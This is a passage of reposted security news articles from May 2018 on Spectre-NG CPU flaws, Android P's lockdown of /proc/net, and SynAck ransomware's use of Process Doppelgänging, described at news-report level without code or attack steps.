8 New Spectre-Class Vulnerabilities (Spectre-NG) Found in Intel CPUs
11.5.2018 thehackernews
Vulnerebility

A team of security researchers has reportedly discovered a total of eight new "Spectre-class" vulnerabilities in Intel CPUs, which also affect at least a small number of ARM processors and may impact AMD processor architecture as well.
Dubbed Spectre-Next Generation, or Spectre-NG, the partial details of the vulnerabilities were first leaked to journalists at German computer magazine Heise, which claims that Intel has classified four of the new vulnerabilities as "high risk" and remaining four as "medium."
The new CPU flaws reportedly originate from the same design issue that caused the original Spectre flaw, but the report claims one of the newly discovered flaws allows attackers with access to a virtual machine (VM) to easily target the host system, making it potentially more threatening than the original Spectre vulnerability.
"Alternatively, it could attack the VMs of other customers running on the same server. Passwords and secret keys for secure data transmission are highly sought-after targets on cloud systems and are acutely endangered by this gap," the report reads.
"However, the aforementioned Spectre-NG vulnerability can be exploited quite easily for attacks across system boundaries, elevating the threat potential to a new level. Cloud service providers such as Amazon or Cloudflare and, of course, their customers are particularly affected."
If you're unaware, Spectre vulnerability, which was reported earlier this year, relies upon a side-channel attack on a processors' speculative execution engine, allowing a malicious program to read sensitive information, like passwords, encryption keys, or sensitive information, including that of the kernel.
Although the German site did not disclose the name of the security researchers (or the team/company) who reported these flaws to Intel, it revealed one of the weaknesses was discovered by a security researcher at Google's Project Zero.
The site also claimed that the Google security researcher reported the flaw to the chip manufacturers almost 88 days ago—which indicates the researcher would possibly reveal the details of at least one flaw on May 7th, when the 90-day disclosure window will be closed, which is the day before the Windows Patch Tuesday.
Responsibly disclosing Spectre NG vulnerabilities to vendors is definitely a good practice, but it seems the researchers, who discovered the new series of Spectre-class flaws, are avoiding their names to come out early—maybe to prevent media criticism similar to the one faced by CTS Labs after they disclosed partial details of AMD flaws with dedicated website, beautiful graphics, and videos.
Intel's Response to Spectre-NG Flaws
Nevermind. When asked Intel about the new findings, the chip maker giant provides the following statement, which neither confirms nor denies the existence of the Spectre-NG vulnerabilities:
"Protecting our customers' data and ensuring the security of our products are critical priorities for us. We routinely work closely with customers, partners, other chip makers and researchers to understand and mitigate any issues that are identified, and part of this process involves reserving blocks of CVE numbers."
"We believe strongly in the value of coordinated disclosure and will share additional details on any potential issues as we finalize mitigations. As a best practice, we continue to encourage everyone to keep their systems up-to-date."
Meanwhile, when asked Heise about the Common Vulnerabilities and Exposures (CVE) numbers reserved for the new Spectre-NG vulnerabilities, the journalist refused to share any details and commented:
"The CVEs are currently only naked numbers without added value. On the other hand, their publication might have meant a further risk to our sources that we wanted to avoid. That's why we decided against it at the moment. We will submit the course, of course."
Brace For New Security Patches
The Spectre-NG vulnerabilities reportedly affect Intel CPUs, and there are also indications that at least some ARM processors are vulnerable to the issues, but the impact on AMD processors has yet to be confirmed.
According to the German site, Intel has already acknowledged the new Spectre-NG vulnerabilities and are planning to release security patches in who shifts—one in May and second is currently scheduled for August.
Microsoft also plans to fix the issues by releasing a security patch with Windows updates in the upcoming months.
However, it’s currently unknown if applying new patches would once again impact the performance of vulnerable devices, just like what happened with the original Spectre and Meltdown vulnerabilities earlier this year.


Android P to Block Apps From Monitoring Device Network Activity
11.5.2018 thehackernews Android

Do you know that any app you have installed on your Android phone can monitor the network activities—even without asking for any sensitive permission—to detect when other apps on your phone are connecting to the Internet?
Obviously, they cant see the content of the network traffic, but can easily find to which server you are connecting to, all without your knowledge. Knowing what apps you often use, which could be a competing or a financial app, "shady" or "malicious" app can abuse this information in various ways to breach your privacy.
But it seems like Google has planned to address this serious privacy issue with the release of its next flagship mobile operating system.
With Android P, any app will no longer be able to detect when other apps on your Android device are connecting to the Internet, according to the new code changes in Android Open Source Project (AOSP) first noticed by XDA Developers.
"A new commit has appeared in the Android Open Source Project to 'start the process of locking down proc/net,' [which] contains a bunch of output from the kernel related to network activity," XDA Developers writes.
"There's currently no restriction on apps accessing /proc/net, which means they can read from here (especially the TCP and UDP files) to parse your device's network activity. You can install a terminal app on your phone and enter cat /proc/net/udp to see for yourself."
Also Read: Android P Will Block Background Apps from Accessing Your Camera, Microphone
However, the new changes applied to the SELinux rules of Android P will restrict apps from accessing some network information.

The SELinux changes will enable only designated VPN apps to access some of the network information, while other Android apps seeking access to this information will be audited by the operating system.
However, it should be noted that the new SELinux changes are coming for apps using API level 28 running on Android P—which means that apps working with API levels prior to 28 continue to have access to the device' network activities until 2019.
A few custom ROMs for Android, such as CopperheadOS, have already implemented these changes years ago, offering better privacy to their users.
As XDA developers pointed out, this new change introduced to the Android operating system appears to be very small that users will hardly notice, "but the implications for user privacy will be massive."


First-Ever Ransomware Found Using ‘Process Doppelgänging’ Attack to Evade Detection
11.5.2018 thehackernews
Ransomware

Security researchers have spotted the first-ever ransomware exploiting Process Doppelgänging, a new fileless code injection technique that could help malware evade detection.
The Process Doppelgänging attack takes advantage of a built-in Windows function, i.e., NTFS Transactions, and an outdated implementation of Windows process loader, and works on all modern versions of Microsoft Windows OS, including Windows 10.
Process Doppelgänging attack works by using NTFS transactions to launch a malicious process by replacing the memory of a legitimate process, tricking process monitoring tools and antivirus into believing that the legitimate process is running.
If you want to know more about how Process Doppelgänging attack works in detail, you should read this article I published late last year.
Shortly after the Process Doppelgänging attack details went public, several threat actors were found abusing it in an attempt to bypass modern security solutions.
Security researchers at Kaspersky Lab have now found the first ransomware, a new variant of SynAck, employing this technique to evade its malicious actions and targeting users in the United States, Kuwait, Germany, and Iran.

Initially discovered in September 2017, the SynAck ransomware uses complex obfuscation techniques to prevent reverse engineering, but researchers managed to unpack it and shared their analysis in a blog post.
An interesting thing about SynAck is that this ransomware does not infect people from specific countries, including Russia, Belarus, Ukraine, Georgia, Tajikistan, Kazakhstan, and Uzbekistan.
To identify the country of a specific user, the SynAck ransomware matches keyboard layouts installed on the user's PC against a hardcoded list stored in the malware. If a match is found, the ransomware sleeps for 30 seconds and then calls ExitProcess to prevent encryption of files.
SynAck ransomware also prevents automatic sandbox analysis by checking the directory from where it executes. If it found an attempt to launch the malicious executable from an 'incorrect' directory, SynAck won't proceed further and will instead terminate itself.
Once infected, just like any other ransomware, SynAck encrypts the content of each infected file with the AES-256-ECB algorithm and provides victims a decryption key until they contact the attackers and fulfill their demands.

SynAck is also capable of displaying a ransomware note to the Windows login screen by modifying the LegalNoticeCaption and LegalNoticeText keys in the registry. The ransomware even clears the event logs stored by the system to avoid forensic analysis of an infected machine.
Although the researchers did not say how SynAck lands on the PC, most ransomware spread through phishing emails, malicious adverts on websites, and third-party apps and programs.
Therefore, you should always exercise caution when opening uninvited documents sent over an email and clicking on links inside those documents unless verifying the source in an attempt to safeguard against such ransomware infection.
Although, in this case, only a few security and antivirus software can defend or alert you against the threat, it is always a good practice to have an effective antivirus security suite on your system and keep it up-to-date.
Last but not the least: to have a tight grip on your valuable data, always have a backup routine in place that makes copies of all your important files to an external storage device that isn't always connected to your PC.


Twitter is Testing End-to-End E